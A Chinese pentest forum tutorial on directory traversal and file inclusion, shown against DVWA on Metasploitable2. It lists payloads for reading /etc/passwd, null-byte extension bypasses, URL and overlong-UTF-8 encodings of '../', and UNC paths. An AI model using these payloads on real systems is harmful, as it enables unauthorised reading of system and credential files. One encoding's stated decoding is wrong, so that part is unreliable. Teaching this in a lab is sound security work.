Web渗透测试_目录遍历-WEB渗透社区-电脑端-X黑手网
X黑手网
点击查看-X黑手网
点击查看-X黑手网

Web渗透测试_目录遍历

Directory traversal / File include

本次以Metasploitable2的dvwa进行演示

  • 目录权限限制不严 / 文件包含

  • /etc/php5/cgi/php.ini(修改这个文件来演示远程文件包含漏洞)

    • allow_url_include = on

 

image

  • 应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件

    • 读、写文件、远程执行代码

  • 特征(不决定)

    • ?page=a.php

    • ?home=b.html

    • ?file=content

经典测试方法

  • ?file=../../../../../../../../../etc/passwd

 

image

 

image

  • 编码绕过字符过滤

  • “.”  “%00”     绕过文件扩展名过滤

    • ?file=a.doc%00.php

  • 使用多种编码尝试

不同操作系统的路径特征字符

  • 类unix系统

    • 根目录:/

    • 目录层级分隔符:/

  • windows系统:C:\

编码

  • url编码、双层url编码

    • %2e%2e%2f        解码:../

    • %2e%2e%5c        解码:..\

    • %252e%252e%252c     解码:..\

  • Unicode/UTF-8  编码

    • ..%c0%af      解码:../

    • ..%u2216

    • ..%c1%9c      解码:..\

其他系统路径可能使用到的字符

  • 其他系统路径可能使用到的字符

    • file.txt…

    • file.txt

    • file.txt””””

    • file.txt<<<>>>><

    • ./././file.txt

    • nonexistant/../file.txt

  • UNC路径

\\1.1.1.1\path\to\file.txt

 

请登录后发表评论

    没有回复内容